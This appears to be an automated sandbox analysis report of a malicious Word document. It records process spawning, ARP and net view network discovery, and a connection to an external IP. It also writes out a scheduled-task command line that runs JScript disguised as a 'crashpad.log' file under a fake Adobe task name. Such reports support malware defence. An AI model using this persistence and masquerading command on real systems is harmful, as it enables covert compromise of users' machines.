2 signatures have been hidden. 13289sig Performs a network lookup / discovery via ARP 13299sig Performs a network lookup / discovery via net view 132815sig Performs a network lookup / discovery via ARP 132915sig Performs a network lookup / discovery via net view d1e513444 85.93.2.148, 443 ARCOMPUS-MEDIANET-ASLB Germany 1->1841sig 2 cmd.exe 1->2      started     7->13317sig 7->13307sig 8 wscript.exe 1 7->8      started     22 wscript.exe 7->22      started     2->13282reducedSig 2->13282sig 4 wscript.exe 6 4 2->4      started     8->7788reducedSig 8->7788sig 12 cmd.exe 8->12      started     18 cmd.exe 1 8->18      started     22->77822reducedSig 22->77822sig 4->7784reducedSig 4->7784sig 4->d1e513444 5reduced Processes exeeded maximum capacity for this level. 1 process has been hidden. 4->5reduced      started     9 cmd.exe 1 4->9      started     15 cmd.exe 1 4->15      started     12->132812reducedSig 12->132812sig 18->132818reducedSig 18->132818sig 20 ARP.EXE 18->20      started     9->13289reducedSig 9->13289sig 9->13299sig 11 net.exe 9->11      started     15->132815reducedSig 15->132815sig 15->132915sig 17 ARP.EXE 15->17      started     process1 signatures1 process2 signatures2 process4 dnsIp4 signatures4 process5 signatures5 process11 fileCreated1 fileCreated2 fileCreated4 fileCreated5 fileCreated11

Simulations

Behavior and APIs

TimeTypeDescription
14:00:54API Interceptor1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
14:01:04API Interceptor24x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:06Task SchedulerRun new task: Adobe Acrobat Player Task path: wscript.exe s>//b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
14:02:00API Interceptor2x Sleep call for process: taskeng.exe modified from: 60000ms to: 500ms
14:02:14API Interceptor2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot